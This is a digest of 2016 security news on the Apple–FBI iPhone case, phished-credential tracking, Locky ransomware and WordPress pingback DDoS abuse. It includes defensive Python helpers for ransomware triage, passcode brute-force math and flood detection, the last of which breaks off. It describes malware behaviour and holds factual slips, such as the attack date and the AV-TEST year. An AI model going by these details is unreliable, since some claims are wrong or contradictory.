“Apple sent trusted engineers to try that method, the executives said, but they were unable to do it. It was then that they discovered that the Apple ID password associated with the iPhone had been changed. (The FBI claimed earlier Friday that this was done by someone at the San Bernardino Health Department.)”

Just after the dramatic event, an unnamed San Bernardino police official executed a procedure to reset the Apple ID passcode associated with Farook’s iPhone.

By default, resetting the Apple ID passcode creates a new device ID linked to the iCloud account that will not automatically sync device data online. The synchronization must be manually configured by the user after generating the new Apple ID password.

In the case of the terrorist’s iPhone, changing the settings was not possible because the device was already locked, and the feds were not able to force a sync with iCloud even by taking the device into range of a known Wi-Fi network.

Now the only remaining possibility for accessing the iPhone data is to push an iOS software update that forces an automatic backup of the iPhone to a third-party server.

The executives explained that creating a backdoor access to Apple iOS devices represents a serious risk for the privacy of millions of users. It could be used to virtually target any Apple device and open the door to massive surveillance.


Project Cumulus – Tracking fake phished credentials leaked to Dark Web
21.2.2016  Hacking

Project Cumulus – A group of experts at Bitglass used watermarks to track data through the Dark Web and discover how far phished credentials get.
In April 2015, a group of experts at Bitglass used watermarks to track data through the Deep Web and discover how far it gets after a data breach. The experts discovered that the countries historically associated with cybercriminal activity, such as Russia, China and Brazil, were the principal access points for the identity data.

Now the same group of experts published the results of a second research, dubbed Project Cumulus “Where’s Your Data”, aiming to track fake personal data across the Internet.

The researchers created fake identities for employees of a fictitious retail bank, along with a functional web portal for the financial institution and a Google Drive account. The experts also associated the identities with real credit-card data, then leaked “phished” Google Apps credentials to the Dark Web and tracked the activity on these accounts.

The results were intriguing: the leaked data were accessed in 30 countries across six continents in just two weeks.

Leaked data were viewed more than 1,000 times and downloaded 47 times, in just 24 hours the experts observed three Google Drive login attempts and five bank login attempts. Within 48 hours of the initial leak, files were downloaded, and the account was viewed hundreds of times over the course of a month, with many hackers successfully accessing the victim’s other online accounts.

“Over 1400 hackers viewed the credentials,” states the report. “1 in 10 hackers who viewed the credentials attempted to log into the bank web portal.” “A torrent of activity resulted within hours of leaking the credentials, with over 1400 visits from over 30 countries recorded between the Dark Web postings and the bank web portal.”

In 36 percent of the cases, hackers successfully accessed the victim’s other online accounts; 94 percent of hackers who accessed the Google Drive discovered the victim’s other online accounts and attempted to log into the bank’s web portal.


Project Cumulus revealed that 68 percent of hackers accessed the Google Drive and bank portal accounts from the Tor network in order to anonymize their identity online.

“One dark web community member encouraged novice hackers to use Tor in conjunction with a VPN service purchased using cryptocurrency, warning that any missteps could lead to prosecution under the Computer Fraud and Misuse Act,” continues the report.

The researchers at Bitglass noticed that most of the visitors of the web portal that did not use the Tor network were from Russia (34.85%), United States (15.67%), China (3.5%), Japan (2%).

Project Cumulus demonstrates the importance of adopting a proper security posture to protect our data: it highlights the dangers of reusing login credentials and shows how quickly phished credentials can spread, exposing sensitive data.


Malicious spam campaign capitalizes the global interest in the Zika virus

20.2.2016 Spam

The cybercrime ecosystem is getting ready to exploit the media attention on the Zika virus infections for illegal activities. Be careful!
What is the relationship between the Zika virus and malware? It’s just a matter of opportunity: the cybercrime ecosystem is getting ready to exploit the media attention on current issues for illegal activities. The Zika virus is a Public Health Emergency, as announced on February 1, 2016, by the World Health Organization (WHO). Zika seems to be responsible for birth defects, and populations in the Americas were the first victims of the virus.

Security experts at Symantec have spotted a malicious spam campaign seeking to exploit the interest in the event.

“Newsworthy events on a regional or global level often provide fertile ground for cybercriminals seeking to capitalize on the interest in these events. In this case, the Zika virus’ impact in countries like Brazil is being leveraged, while the potential impact in other countries make it a prime candidate for more malicious spam.” states a blog post published by Symantec.
Most cases of the Zika virus were reported in Brazil, the same country where cyber security experts have spotted the malicious spam campaign.


The campaign that targeted Brazilians relies on malicious spam emails that pretend to be sent by Saúde Curiosa (Curious Health), a Brazilian health web portal.

The messages used the following subject:

“ZIKA VIRUS! ISSO MESMO, MATANDO COM ÁGUA!” which translates to: “Zika Virus! That’s Right, killing it with water!”

The text of the message includes buttons labelled “Eliminating Mosquito! Click Here!” and “Instructions To Follow! Download!”, as well as a file attachment.

The buttons redirect victims to the file hosting service Dropbox, where experts discovered the same file attached to the spam emails (JS.Downloader), used by crooks to download additional malware onto the infected machine.

Symantec provided the following suggestions to limit exposure to this specific campaign:

For information about the Zika virus, visit the World Health Organization’s website
Always look for trusted news sources, regionally and globally, for additional information
Avoid clicking on links or opening attachments in unsolicited email messages
Run security software on your computer and ensure that it is up to date


FBI Screwed Up — Police Reset Shooter's Apple ID Passcode that leaves iPhone Data Unrecoverable
20.2.2016 Apple
Another Surprising Twist in the Apple-FBI Encryption Case: The Apple ID Passcode Changed while the San Bernardino Shooter's iPhone was in Government Custody.
Yes, the Federal Bureau of Investigation (FBI) has screwed up and is left with no option to retrieve data from the iPhone that belonged to San Bernardino shooter Syed Farook.
Apple has finally responded to the Department of Justice (DoJ) court filing that attempts to force Apple to comply with an FBI request to help the feds unlock Farook's iPhone, and Apple refused to do so.
According to Apple, the company had been helping the feds with the investigation since early January to provide a way to access Farook's iPhone, but the problem is that the feds approached the company only after committing a 'blunder' themselves.
Here's How the FBI Screwed itself
On October 19, 2015, roughly six weeks before the San Bernardino terrorist attacks, Syed Farook made a last full iCloud backup of his iPhone 5C, which Apple had already provided to the FBI under a court order.
Now the FBI is looking for the data on Farook's phone stored between October 19, 2015, and the date of the attacks on December 12, which has not yet been synced with Farook's iCloud account.
When the FBI approached Apple to help them brute force the passcode without losing data, Apple suggested an alternative to the feds: connect Farook's iPhone to the Internet by taking it into range of a known Wi-Fi network. This way his phone would have automatically backed up its data to his iCloud account.
But the Twist lies here:
Just after the terrorist attacks, an unnamed San Bernardino police official 'Reset the Apple ID Passcode' associated with Farook's iPhone 5C "less than 24 hours after the government took possession of the device" in an attempt to access the data.
Here's the blunder:
By default, resetting the Apple ID password essentially creates an entirely new device ID on an iCloud account that will not automatically sync device data online, until the user manually configures the newly generated Apple ID password within the device settings.
Unfortunately, Farook's iPhone is already LOCKED, and Apple has already refused to provide a backdoor to bypass the device passcode.
So, the authorities are now left with no chance to pull off the data from iCloud even if they take the device to the known Wi-Fi range.
Here's what a senior Apple executive who requested anonymity told BuzzFeed:
The Apple ID passcode linked to the iPhone belonging to one of the San Bernardino terrorists was changed less than 24 hours after the government took possession of the device, senior Apple executives said Friday. If that hadn't happened, Apple said, a backup of the information the government was seeking may have been accessible…
The executives said the company had been in regular discussions with the government since early January, and that it proposed four different ways to recover the information the government is interested in without building a back door. One of those methods would have involved connecting the phone to a known wifi network.
The statement came just hours after the DoJ criticized Apple's response to the court order.
Possible Alternative Ways to Recover Data
But, there could still be some way out to get the data the FBI needed. One way could be if it is possible for Apple to simply restore the changes made to Farook's iCloud account.
This way the feds could bring the device into range of a known Wi-Fi network and have the data automatically synced to the associated iCloud account, unless Farook had purposely turned off auto-backup.
Another possible way to recover the data without unlocking the device could be forcefully pushing (if and only if it is possible to install an update without user interaction) an iOS software update to the target device with an additional inbuilt application that will simply auto-backup every file on the system to a third party server.


Donald Trump — Boycott Apple! But Still Tweeting from an iPhone
20.2.2016 Apple
As the groundwork for the United States presidential election, to be held on 8 November 2016, is being laid, candidates are very busy sharpening their skills to win voters' confidence.
Struggling to gain the upper hand on national issues at this moment could benefit the candidates by bringing them into the limelight.
Donald Trump (a presidential candidate from the Republican Party) is no exception.
Recently, during a rally in South Carolina yesterday, Trump made a controversial statement calling for a boycott of Apple until the company hands over the San Bernardino terrorist's phone data to the authorities.
"First of all, Apple ought to give the security for that phone. What I think you ought to do is boycott Apple until they give that security number," Trump said at the rally.
This was a reaction to Apple's denial of a Californian judge's request to build a backdoor for the shooter's iPhone.
Although many politicians have slammed Apple's decision, the company's stand is backed by many big players such as Google, Facebook, Twitter and WhatsApp.
Though Donald Trump's reaction to Apple's stand against the FBI sounds very aggressive in his tweet, the most interesting fact is that he sent the controversial tweet from his iPhone.
As Trump's tweet got an overwhelming response from the Twitter community, NSA whistleblower Edward Snowden weighed in with a gripping statement that read, "can we boycott Trump instead."
Trump earlier called Snowden a "grandstander" and indirectly demanded his execution for leaking the NSA's illegal activities, while appearing on the "Fox and Friends" program in 2013.
Now, Snowden had his tit for tat through a tweet.
Trump Pledged Not to Use iPhone
Apart from his tweet that said to boycott Apple, Trump had pledged that he would not use his iPhone until Apple gives the data from the terrorist's locked phone to the FBI.
"I use both iPhone & Samsung. If Apple doesn't give info to authorities on the terrorists I'll only be using Samsung until they give info," Trump tweeted.
As Trump has made headlines with provocative tweets to boost his election campaign, let's wait and see whether other candidates follow the same road by inflating the "Apple v/s FBI" issue further.


Apple addresses bricked iPhones and reissues update 9.2.1

20.2.2016 Mobile
The mysterious Error 53 turned a lot of iPhones into expensive paperweights. The company is now apologizing and adding a fix.

Apple has re-released iOS 9.2.1 to fix Error 53, which bricked all new-generation iPhones containing parts replaced by the user or by an unofficial repair shop.

The new iOS 9.2.1 will only be available to those who update their iPhones through iTunes on a Mac or Windows PC. Most phone owners, however, update over the phone's internet connection, so they will not receive this version of the operating system.

Error 53 appeared on the iPhone 6, 6S, 6 Plus and 6S Plus, i.e. the latest line. It occurred when the user or a repair shop replaced the Home button (which includes Touch ID, the fingerprint authentication sensor), the cable, or in some cases even the display. Once the error appeared, the phone was completely unusable.

Reports of the error caused outrage among iPhone users, and it was criticized by, among others, Kyle Wiens, founder of iFixit.com, who sees it as a threat to unofficial repairs.

"Owners have the right to repair their products or to entrust them to technicians they trust," Wiens said last week in an email to Computerworld.

Lawyers also took up the case. A week ago a Seattle law firm sued Apple on behalf of five people.

In a statement yesterday, however, the company apologized for bricking customers' iPhones.

"Apple today released a software update that will allow customers who saw this error message [Error 53] to successfully restore their device using iTunes on a Mac or PC," an Apple spokesperson confirmed in an email. "We apologize for any inconvenience."

If a customer meanwhile bought a new iPhone after learning that the company would not repair theirs, they will be compensated. AppleCare, which users should contact, will handle it.

Meanwhile the company has quietly changed its description of the mechanism behind Error 53. Last week Apple stated that "it is the result of security checks designed to protect our customers. iOS checks that the Touch ID sensor in your iPhone or iPad matches the other components in the device. If iOS finds a mismatch, the check fails and Touch ID is disabled, including for use with Apple Pay. This security measure is necessary to protect your device and prevent unintended use of a fraudulent Touch ID."

Yesterday, however, Apple somewhat changed the definition of that check, stating that it "was designed to check whether Touch ID works correctly before it leaves the factory."

Even with the new update, the operating system will continue to look for mismatched components, the company said. If iOS detects a replaced component, it will disable Touch ID. The difference? The iPhone itself should no longer turn into a brick.


Apple responded to date-bricked iPhones: The problem exists, wait for an update
20.2.2016
Mobile
It took a while, but Apple has responded to the bug that bricks an iOS device when the date is set to 1.1.1970. The Apple Support page addresses the problem very dryly, giving only this notice: Setting the date to May 1970 or earlier can prevent your iOS device from turning on after a restart.

So the problem is not only with the date January 1, 1970, but with anything from then up to May. The word "can" should be read as follows: older 32-bit devices are not affected by this bug, newer 64-bit ones are (i.e. those with the A7, A8, A8X, A9 and A9X processors). But if you have one of the new ones, bricking by the critical date is certain.

In its second sentence Apple states that an upcoming iOS update will fix the problem. It does not say, however, when we will get it.


Linux Foundation Launches 'Zephyr', a tiny OS for Internet of Things
20.2.2016 OS
The 21st century is witnessing a great change over in the daily life of folks with the advent of IoT devices that are capable of talking to each other without any human intervention.
Yeah! Now you do not have to individually cascade an instruction to each of your home devices to accomplish a task. All have gone automated with the actuators and sensors which are infused into the home appliances.
The fact is that your IoT devices only interoperate within the same manufacturer's family. For example, if you have a Samsung smart refrigerator and your wearable device is from Apple or another vendor, they cannot sync, as both come from different ecosystems.
No need to worry now!
Zephyr: Future of IoTs
The Linux Foundation has broken all the barriers of compatibility issues by releasing a Real-Time Operating System (RTOS) for Internet of Things devices, dubbed "Zephyr". This OS enables connected devices to communicate with the same protocol.
So, no more digital barricades between your thermostat and your wearable devices, as they could communicate with each other using the same protocols.
The Zephyr project is supported by multiple companies, including NXP Semiconductors, Synopsys and UbiquiOS Technology, and is licensed under Apache 2.0.
Why is Zephyr so important?
Zephyr stands out from the crowd as it provides a scalable, customizable, secure and open source operating system to be used across multiple architectures.
Doing so, Zephyr could help solve many of the current limitations that prevent, so far, Internet of Things from becoming really mainstream.
Zephyr is expected to take the best of both sides: low-consumption as well as speed.
Here are some key points about Zephyr:
Scalability: Universality of interconnected devices
Umbrella Platform: All smart devices could run under a single roof.
Baby Footprint Kernel: The Zephyr kernel can run on devices with 8 KB of memory.
Modularity: Supports integration of third-party modules for additional functions, as intended by the developer.
Licensing: Startups do not have to worry about licensing clashes, as a single license file is provided to everyone.
Apart from these features, Zephyr also supports technologies including Bluetooth, Bluetooth Low Energy, IEEE 802.15.4, 6LoWPAN, CoAP, IPv4 and IPv6, NFC, Arduino 101, Arduino Due, Intel Galileo Gen 2, and the NXP FRDM-K64F Freedom board.
Security in Mind

Since connected devices are among the most hack-prone items, they may malfunction when compromised.
However, the Linux Foundation is concerned about the security of individuals, and open source software is generally considered more secure, as anyone can inspect the code for flaws and debug it.
For this reason, the Linux Foundation is maintaining a dedicated security working group and a delegated security maintainer who is available through IRC chats, so that anyone can report vulnerabilities in open discussions.
Although there are many other alternatives available for an Internet of Things RTOS, like Brillo from Google, Rocket from Intel, and Ubuntu Core from Canonical, nothing would be as fascinating as Zephyr.


Locky Ransomware uses AES to encrypt Local Files and Unmapped Network Shares
20.2.2016 Virus

Security researchers discovered a strain of ransomware called Locky that uses AES encryption to encrypt local files and files on network shares.
Security researchers have discovered a new piece of ransomware called Locky, which uses AES encryption algorithm to encrypt both local files and files on network shares, even if they are unmapped.

Security experts at BleepingComputer spotted a new strain of ransomware dubbed Locky that encrypts local files and files on network shares by using the AES encryption.

“A new ransomware has been discovered called Locky that encrypts your data using AES encryption and then demands .5 bitcoins to decrypt your files. ” BleepingComputer reports in a blog post.

The experts noticed that Locky is the second ransomware spotted in recent months that is able to encrypt files on unmapped network shares, a trend that results from the availability online of the source code of ransomware like Hidden Tear.

The Locky ransomware is being spread via malicious emails with Word document attachments that pretend to be an invoice, but that includes malicious macros. When the victim enables macros to view the document, it triggers a downloader for the Locky ransomware. The malware is then downloaded from a remote server and executed.

Like the CryptoWall ransomware, Locky changes the filenames of encrypted files to make data recovery harder.

When started, Locky creates and assigns a unique 16-digit hexadecimal number to the infected machine, then scans all drives and unmapped network shares for files to encrypt.

The malware uses the AES encryption algorithm and encrypts only files with extensions matching certain criteria, while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).

The Locky ransomware encrypts files, renaming them to [unique_id][identifier].locky; the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.

The malware will also delete all of the Shadow Volume Copies of documents, making it impossible to restore files from them.

Locky leaves a ransom note, _Locky_recover_instructions.txt, in each folder containing encrypted files.


“Inside the Locky ransom notes are links to a Tor site called the Locky Decrypter Page. This page is located at 6dtxgqam4crv6rr6.onion and contains the amount of bitcoins to send as a payment, how to purchase the bitcoins, and the bitcoin address you should send payment to. Once a victim sends payment to the assigned bitcoin address, this page will provide a decrypter that can be used to decrypt their files.” continues the post.

“Locky will change the Windows wallpaper to %UserProfile%\Desktop\_Locky_recover_instructions.bmp, which contains the same instructions as the text ransom notes.”
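A triage helper written for this section (not BleepingComputer's or the malware's code) that walks a file listing and reports, per directory, the files that follow the [unique_id][identifier].locky naming scheme and whether the _Locky_recover_instructions.txt note is present. It assumes the identifier part is hexadecimal too (the article only states that for the 16-digit machine ID), and the sample paths are constructed.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Naming scheme described above: a 16-hex-digit machine ID followed by a
# per-file identifier and the .locky extension. The identifier is assumed
# to be hexadecimal as well (assumption, not stated in the article).
LOCKY_NAME = re.compile(r"^([0-9A-Fa-f]{16})([0-9A-Fa-f]+)\.locky$")
RANSOM_NOTE = "_Locky_recover_instructions.txt"


def parse_locky_name(filename):
    """Return (machine_id, file_identifier) for a Locky-style name, else None."""
    match = LOCKY_NAME.match(filename)
    if not match:
        return None
    return match.group(1).upper(), match.group(2).upper()


def triage_listing(paths):
    """Group a file listing by directory and count Locky artifacts per directory.

    Handles local drive letters and UNC share paths, matching the local drives
    and unmapped network shares the ransomware walks.
    """
    by_dir = defaultdict(
        lambda: {"encrypted": 0, "machine_ids": set(), "ransom_note": False}
    )
    for raw in paths:
        path = PureWindowsPath(raw)
        folder = str(path.parent)
        parsed = parse_locky_name(path.name)
        if parsed is not None:
            by_dir[folder]["encrypted"] += 1
            by_dir[folder]["machine_ids"].add(parsed[0])
        elif path.name.lower() == RANSOM_NOTE.lower():
            by_dir[folder]["ransom_note"] = True
    return dict(by_dir)


def summarize(report):
    """Roll the per-directory report up into the first numbers an IR lead asks for."""
    machine_ids = set()
    encrypted = 0
    missing_note = []
    for folder, entry in report.items():
        encrypted += entry["encrypted"]
        machine_ids |= entry["machine_ids"]
        # Encrypted files without a note: the folder may still be in progress.
        if entry["encrypted"] and not entry["ransom_note"]:
            missing_note.append(folder)
    return {
        "directories_hit": sum(1 for e in report.values() if e["encrypted"]),
        "encrypted_files": encrypted,
        "machine_ids": sorted(machine_ids),  # one ID per infected host
        "dirs_missing_note": sorted(missing_note),
    }


# Constructed sample listing (not real incident data): one workstation plus an
# unmapped share hit by the same infected machine, and two benign files.
SAMPLE_LISTING = [
    r"C:\Users\alice\Documents\budget.xlsx",
    r"C:\Users\alice\Documents\F67091F1C3D4A5B6A1B2C3D4E5F60718.locky",
    r"C:\Users\alice\Documents\F67091F1C3D4A5B6DEADBEEF00112233.locky",
    r"C:\Users\alice\Documents\_Locky_recover_instructions.txt",
    r"\\fileserver\finance\reports\F67091F1C3D4A5B60123456789ABCDEF.locky",
    r"\\fileserver\finance\reports\_Locky_recover_instructions.txt",
    r"\\fileserver\finance\archive\F67091F1C3D4A5B6FFFFFFFF00000000.locky",
    r"C:\Windows\System32\notalocky.locky",  # non-hex name: not the Locky scheme
]

if __name__ == "__main__":
    report = triage_listing(SAMPLE_LISTING)
    for folder, entry in sorted(report.items()):
        print(folder, entry)
    print(summarize(report))
```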


15-year-old Teenage Hacker Arrested Over FBI Computer Hack
19.2.2016 Hacking
Another 15-year-old teenager was arrested in the land of cakes, Scotland, by British police for breaking into FBI systems on 16th February.
Under Britain’s anti-hacking law, the Computer Misuse Act 1990, the boy was arrested for his role in hacking and unauthorized access to digital material.
Federal agents had flown to Glasgow to carry out a raid on his home before proceeding with the boy's arrest.
"He has since been released and is the subject of a report to the procurator fiscal," a police spokesman told a Scottish journal.
In the present scenario, reports say that the boy could be extradited to the United States to face intrusion and hacking charges.
Second Member of the Hacking Group Arrested
The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.
Another member of the same group was arrested in the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI.
The hacktivist group "Cracka with Attitude" is behind a series of hacks on the United States government and its high-level officials, including:
Leaked the personal and sensitive details of tens of thousands of FBI agents and the US Department of Homeland Security (DHS) employees.
Hacked into AOL emails of CIA director John Brennan.
Hacked into the personal phone accounts and emails of the US spy chief James Clapper.
Broke into AOL emails of the FBI Deputy Director Mark Giuliano.
Last Member of Hacking Group Left
Additionally, it is assumed that only one more member (with the pseudonym "Thwarting Exploits") is left in the CWA group to be busted, as became evident from his tweet confirming that this was the third member of the group.
Nowadays, teenage hackers with an amateurish approach are hunting down the world's greatest crime solvers, such as the FBI and CIA.
The busted cyber criminals are liable to spend the rest of their lives behind bars; cyber laws are strict enough that the sentences can consume a whole lifetime, and sometimes more.


Now We Know — Apple Can Unlock iPhones, Here's How to Hack-Proof your Device
19.2.2016 Apple
Apple has been asked to comply with a federal court order to help the FBI unlock an iPhone 5C by one of the terrorists in the San Bernardino mass shootings that killed 14 and injured 24 in December.
The FBI knows that it cannot bypass the encryption on the iPhone, but it knows very well that Apple can build a way for them to try more than 10 PINs on the dead shooter's iPhone without the device's data self-destructing.
Although Apple refused to comply with the court order and has always claimed it can no longer unlock phones, the FBI has cleverly shown that Apple does have a technical way to help the feds access data on a locked iOS device.
And this is the first time Apple has not denied that it can unlock iPhones; rather, it simply refused to build the FBI a backdoor for the iPhone, in an attempt to maintain its users' trust.
So, now we know that Apple is not doing so, but it has the ability to do so.
Now that you know there is a chance your iPhone could be accessed by the government even if you have enabled the "Auto-Destruct Mode" security feature on your device, you need to protect your iPhone with more than just a 4- or 6-digit passcode.
How to Hack-Proof your iPhone?
Yes, it is possible for you to protect yourself from government snooping just by setting a strong passcode on your iPhone — passcode that the FBI or any government agency would not be able to crack even if they get iPhone backdoor from Apple.
Without wasting much of your time, here's one simple solution:
Simply set a random numeric passcode of at least 11 digits for your iPhone.
Here's why (FBI Can't Crack It):
There is only one way, i.e. Brute Force attack, to crack your iPhone passcode. This is what the FBI is demanding from Apple to create a special version of iOS that increases the brute force attempts and ignores the data erasure setting.
iPhones are intentionally designed so that a single passcode attempt takes about 80 milliseconds, according to Apple.
So, if your iPhone is using a 6-digit passcode and there are 1 Million possible combinations as a whole, it would take maximum time of 22 hours or on average 11 hours to successfully unlock iPhone.
However, if you are using a longer passcode such as a random 11-digit passcode, it will take up to 253 years, and on average 127 years to unlock iPhone.
Doing so will make the FBI or any other agency unable to unlock your iPhone; not unless they have hundreds of years to spare.
To set a strong passcode, click 'Passcode options,' select 'Custom numeric code,' and then enter your new but random passcode.
Things to Avoid While Setting a Passcode
1. Do Not Use a Predictable Passcode: Avoid choosing a predictable string such as your birth dates, phone numbers, or social security numbers, as these are first priorities of attackers to try.
2. Do Not Use iCloud Backups: Avoid using an iCloud backup because doing so will enable the attacker to get a copy of all your iPhone’s data from Apple’s server, where your passcode no longer protects it. This will eliminate the need to guess your passcode.
3. Do Not Use Your Fingerprint: We have seen data breaches that had exposed fingerprints online and also, it is easy to bypass Apple Touch ID Fingerprint scanner. Even fingerprints can be collected from a suspect's corpse. So, using fingerprint security feature could also end up unlocking your iPhone in less time.
So, by choosing a strong passcode, the FBI or any other agency will not be able to unlock your encrypted iPhone, even if they install a vulnerable version of iOS on it.
Warning: You need to remember your passcode, whatever you set, because no one except you will be able to unlock your iPhone. Once you forget your passcode, there is nothing you can do to get your important data, or even access to your iPhone, back.
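The brute-force arithmetic behind the 22-hour and 253-year figures, as an added example (not from the article or from Apple): it reproduces the page's numbers from the 80 ms per-attempt cost and generalizes to other alphabet sizes and to the reverse question of how many digits are needed for a chosen lifetime. It assumes, as the article does, that the escalating delays and erase-after-10 setting have been removed and only the per-attempt cost remains.

```python
SECONDS_PER_ATTEMPT = 0.08  # ~80 ms per passcode attempt, as stated above
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace(length, alphabet_size=10):
    """Number of candidate passcodes; numeric PINs use a 10-symbol alphabet."""
    return alphabet_size ** length


def crack_time_seconds(length, alphabet_size=10, seconds_per_attempt=SECONDS_PER_ATTEMPT):
    """Worst-case and average time for an exhaustive search of the passcode space.

    Assumes the modified iOS described above: no escalating delays and no
    erase-after-10 limit, so only the per-attempt key derivation cost remains.
    """
    worst = keyspace(length, alphabet_size) * seconds_per_attempt
    return worst, worst / 2


def crack_time_years(length, alphabet_size=10):
    """Same figures expressed in years (worst case, average)."""
    worst, average = crack_time_seconds(length, alphabet_size)
    return worst / SECONDS_PER_YEAR, average / SECONDS_PER_YEAR


def min_length_for(target_years, alphabet_size=10):
    """Smallest passcode length whose average crack time exceeds target_years."""
    length = 1
    while crack_time_years(length, alphabet_size)[1] < target_years:
        length += 1
    return length


def table(max_length=12):
    """(digits, worst-case hours, worst-case years) for numeric passcodes."""
    rows = []
    for n in range(4, max_length + 1):
        worst_s, _ = crack_time_seconds(n)
        rows.append((n, worst_s / 3600, worst_s / SECONDS_PER_YEAR))
    return rows


if __name__ == "__main__":
    for digits, hours, years in table():
        print(f"{digits:2d} digits: {hours:>14,.1f} h  ({years:,.2f} years)")
    print("digits needed for a 100-year average:", min_length_for(100))
    # A 36-symbol alphanumeric code needs fewer characters for the same lifetime.
    print("alphanumeric chars for 100 years:", min_length_for(100, alphabet_size=36))
```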


AV-TEST 2015 AWARDs – Which are the best antivirus solutions?
19.2.2016 Virus

2015 awards – For the fifth year in succession the AV-TEST Institute is awarding firms that offered the most efficient IT protection solutions.
On February 17, 2016, the independent institute AV-TEST is awarding the AV-TEST AWARDs to companies that developed antivirus software in 2015. The awards were assigned to products grouped in the categories “PROTECTION”, “PERFORMANCE”, “USABILITY”, “REPAIR” and “ANDROID SECURITY”. The experts divided each category into the user groups of home and corporate users.

This is the first time that AV-TEST awards the most interesting protection solutions in the security industry; the products were tested in the laboratory of the institute throughout the year 2015. The awards are divided into the user groups of home and corporate users.

AV-TEST 2015 AWARDS

PROTECTION

The AV-TEST BEST PROTECTION 2015 AWARD is assigned to the best protection software against malware; this year the experts assigned it to Symantec Norton Security for home users, and to Symantec Endpoint Protection in the area of corporate solutions.
PERFORMANCE

The experts analyzed the impact of protection solutions on the speed of a Windows PC and assigned the AV-TEST BEST PERFORMANCE 2015 AWARD in the home user field to the products Bitdefender Internet Security and Kaspersky Internet Security, meanwhile the best corporate solution is Bitdefender Endpoint Security.

USABILITY

Antivirus solutions are becoming even more user-friendly, but experts who tested the different products assigned the AV-TEST BEST USABILITY 2015 AWARD in the area of home users to two products due to a tie score: Avira AntiVirus Pro and Kaspersky Internet Security. The award for the corporate products is assigned to a solution developed by Intel Security with McAfee Endpoint Security.

REPAIR

Which is the best repair tool for Windows systems after a malware attack? The researchers assigned the AV-TEST BEST REPAIR 2015 AWARD to the Avira Antivirus Pro security suite and to the Kaspersky Virus Removal.

ANDROID SECURITY

Let’s close with the best solution for protecting Android devices: the experts at AV-TEST assigned the AV-TEST BEST ANDROID SECURITY PRODUCT 2015 AWARD to Bitdefender Mobile Security, which obtained the best results across all test categories. The second award goes to Sophos Mobile Security.


Thousands of WordPress websites used as a platform to launch DDOS
19.2.2016 Computer Attack

In a recent investigation case, security researchers at Sucuri revealed that 26,000 different WordPress sites were exploited to launch Layer 7 distributed denial of service (DDoS) attacks.
In a recent investigation, security researchers at Sucuri revealed that 26,000 different WordPress sites were generating a sustained rate of 10,000 to 11,000 HTTPS requests per second against one website, sometimes peaking at 20,000. The problem is that any WordPress website can be used to attack the availability of other websites if the pingback feature is enabled (which is its default setting).

HTTP flood, or Layer 7, attacks inundate the web server with application-layer requests, producing very large DDoS attacks that disrupt a server by exhausting its resources at the application layer rather than at the network layer. They do not require as many requests or as much bandwidth to cause damage; they are able to force a large consumption of memory and CPU on most PHP applications, content management systems (CMS), and databases.

Sucuri founder and CTO Daniel Cid recommends disabling pingbacks on your site. It won’t protect you from being attacked, but it will stop your site from attacking others.

“The best course of action is to disable pingbacks and if possible, disable xmlrpc altogether if you are not using it. If you are, you can make some very small changes to your .htaccess file to allow only whitelisted IPs to access the file. This might be the case with the popular JetPack plugin,” he said.

Figure 1: taken from http://www.tweaktown.com/

It has been known for years that the WordPress pingback service can be abused for DDoS attacks, mainly because website owners rarely bother to prevent their site from being added to a botnet. Since the attack comes from thousands of different IPs, network-based firewalls will do little to stop it, as they only rate-limit per IP address. The researchers discovered that the majority of IP addresses used in this attack belonged to sites hosted on popular VPS/cloud/dedicated server providers: Amazon AWS, Digital Ocean, Google Cloud, Microsoft Azure, Hetzner, OVH and Linode.
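As an added example (not part of the Sucuri investigation or of this article), the detection logic a site operator could run over web server access logs to recognise a pingback flood like the one described, from both sides: the victim seeing requests from many reflectors, and a WordPress site owner seeing the xmlrpc.php calls that turn his site into one. It assumes the combined log format and that a WordPress pingback request carries a User-Agent of the form "WordPress/<version>; <site URL>"; all log lines are constructed.

```python
import re
from collections import Counter
from datetime import datetime

# Apache/nginx "combined" format (assumption: the servers log this way).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# User-Agent a WordPress site sends when delivering a pingback (assumption
# stated in the lead-in), e.g. "WordPress/4.4.2; http://their-site".
PINGBACK_UA_RE = re.compile(r'^WordPress/\d+(?:\.\d+)*; (?P<site>https?://\S+)$')


def parse_line(line):
    """Return a dict for one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def analyze_inbound(lines, rps_threshold, min_distinct_ips):
    """Victim-side view: how much pingback-style traffic is hitting us and from
    how many sources. A flood is flagged only when the peak per-second rate is
    high AND the sources are spread out, because per-IP rate limiting (what a
    network firewall does) is useless against thousands of reflectors."""
    per_second = Counter()
    per_ip = Counter()
    reflecting_sites = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ua = PINGBACK_UA_RE.match(rec["ua"])
        if ua is None:
            continue
        per_second[rec["ts"]] += 1          # timestamps have one-second resolution
        per_ip[rec["ip"]] += 1
        reflecting_sites.add(ua.group("site"))
    peak = max(per_second.values(), default=0)
    return {
        "peak_rps": peak,
        "distinct_ips": len(per_ip),
        "reflecting_sites": sorted(reflecting_sites),
        "flood": peak >= rps_threshold and len(per_ip) >= min_distinct_ips,
    }


def xmlrpc_posts(lines):
    """Reflector-side view: POSTs to our own xmlrpc.php are the pingback.ping
    calls an attacker sends to make *our* site fire requests at the victim.
    Returns a Counter of source IP -> number of POSTs."""
    hits = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/xmlrpc.php"):
            hits[rec["ip"]] += 1
    return hits


def _line(ip, ts, method, path, ua):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 512 "-" "{ua}"'


# Constructed sample: 30 reflectors hit the victim within the same second,
# plus one ordinary visitor. Real floods run at thousands of requests/second.
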